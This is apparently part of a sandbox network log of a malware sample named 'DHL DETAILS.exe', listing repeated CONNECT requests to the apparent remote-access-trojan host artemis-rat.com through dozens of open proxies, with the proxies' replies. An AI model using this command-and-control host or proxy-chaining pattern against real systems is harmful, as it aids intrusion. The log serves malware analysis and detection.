Mar 9, 2024 13:14:14.004934072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
321	192.168.2.5	51146	203.30.191.34	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.369273901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.523793936 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
322	192.168.2.5	51298	43.157.51.43	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.370274067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
323	192.168.2.5	51299	43.157.51.43	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.371747971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
324	192.168.2.5	50965	98.162.25.4	31654	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.372549057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
325	192.168.2.5	51301	43.157.51.43	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.373157978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
326	192.168.2.5	51302	43.157.51.43	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.374300957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
327	192.168.2.5	50882	8.213.137.155	135	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.378995895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.785095930 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:17.785325050 CET	44	IN	HTTP/1.1 200 OK Content-Type: text/html

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
328	192.168.2.5	50899	130.162.213.175	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.379092932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.692152977 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
329	192.168.2.5	51167	104.16.108.42	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.379621983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.533839941 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
330	192.168.2.5	51175	104.16.25.216	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.383275986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.537301064 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
331	192.168.2.5	50927	147.75.92.251	10006	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.383598089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.667865992 CET	356	IN	HTTP/1.0 502 Bad Gateway Server: Zscaler/6.3 Content-Type: text/html Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
332	192.168.2.5	51187	172.67.69.9	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.389959097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.544321060 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
333	192.168.2.5	51186	104.16.108.234	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.390043974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.544269085 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
334	192.168.2.5	50904	194.233.78.142	35760	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.403027058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.098681927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
335	192.168.2.5	50953	13.40.239.130	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.404493093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.695316076 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
336	192.168.2.5	50900	8.213.137.155	1081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.405230045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.795840979 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:17.796250105 CET	44	IN	HTTP/1.1 200 OK Content-Type: text/html

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
337	192.168.2.5	50831	35.154.71.72	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.408339977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.793512106 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
338	192.168.2.5	50859	119.3.215.41	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.413213968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
339	192.168.2.5	50946	54.38.176.200	26591	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.419305086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
340	192.168.2.5	50975	119.196.168.183	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.423124075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.741797924 CET	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
341	192.168.2.5	51003	82.64.77.30	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.430557013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.731008053 CET	555	IN	HTTP/1.1 403 Proxy Error Date: Sat, 09 Mar 2024 12:14:13 GMT Server: Apache X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 43 6f 6e 6e 65 63 74 20 74 6f 20 72 65 6d 6f 74 65 20 6d 61 63 68 69 6e 65 20 62 6c 6f 63 6b 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
342	192.168.2.5	50979	162.55.87.48	5566	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.437483072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.751759052 CET	729	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
343	192.168.2.5	50043	162.240.72.139	20614	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.437611103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.567580938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.568129063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.567614079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.677552938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
344	192.168.2.5	50935	77.91.74.77	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.439235926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.774830103 CET	129	IN	HTTP/1.1 301 Moved Permanently Location: https://artemis-rat.com:443 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
345	192.168.2.5	50919	103.189.116.108	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.440666914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.007668018 CET	19	IN	HTTP/1.1 200 OK

